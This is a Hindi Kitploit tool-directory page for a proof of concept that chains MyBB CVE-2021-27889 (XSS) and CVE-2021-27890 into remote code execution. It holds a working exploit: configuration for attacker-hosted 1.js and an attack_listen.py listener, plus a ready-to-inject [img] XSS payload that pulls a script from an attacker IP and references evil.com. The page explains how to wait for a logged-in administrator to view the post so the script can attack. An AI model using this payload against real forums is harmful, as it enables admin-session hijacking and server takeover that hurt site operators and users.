Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Mybb-XSS_SQL_RCE-POC — Mybb CVE-2021-27890 और CVE-2021-27889 को RCE पोक से जोड़ता है | Kitploit
उपकरण/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषण
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

Mybb CVE-2021-27890 और CVE-2021-27889 को RCE पोक से जोड़ता है

रिपॉजिटरी देखें
1025 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Mybb-XSS_SQL_RCE-POC

Mybb में CVE-2021-27890 और CVE-2021-27889 को RSE पीओसी से जोड़ा गया

उपयोग से पहले:

यहाँ दो फ़ाइलें हैं: 1.js और attack_listen.py

आपको इन दो फ़ाइलों को बदलना होगा:

1.js:

mybb फ़ोरम URL और अटैक URL बदलें:

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

अटैक होस्ट और अटैक पोर्ट बदलें:

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

उपयोग विधि:

CVE-2021-27889 एक XSS है। आपको हमले से पहले निम्नलिखित पेलोड को "नई पोस्ट थ्रेड" या "जवाब दें" या "निजी संदेश" में इंजेक्ट करना होगा। इस डेमो में, मैं पेलोड को "नई पोस्ट थ्रेड" में भेजता हूँ।

ध्यान दें कि 192.168.92.165 ईविल सर्वर आईपी है, आपको इसे बदलना होगा।

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


अब हमारी ईविल जावास्क्रिप्ट 1.js सफलतापूर्वक इंजेक्ट हो गई है। फिर हमें प्रतीक्षा करनी होगी कि कोई एडमिन लॉग इन एडमिन पेज कुकी के साथ इस पोस्ट को ब्राउज़ करे।

ध्यान दें कि एडमिन उपयोगकर्ता के लिए फ़ोरम पेज पर लॉग इन होना आवश्यक नहीं है।


प्रतीक्षा के दौरान, हमें अपनी अटैक मशीन पर "attack_listen.py" चलाना चाहिए, ताकि यह पहचान सकें कि एडमिन उपयोगकर्ता पर हमला हुआ या नहीं।

root@kitploit:~
python3 attack_listen.py

जब एडमिन उपयोगकर्ता ईविल पोस्ट ब्राउज़ करेगा, तो ईविल जावास्क्रिप्ट हमला करेगी:


हम अपनी अटैक मशीन पर जानकारी प्राप्त कर सकते हैं:

टूल डाउनलोड करें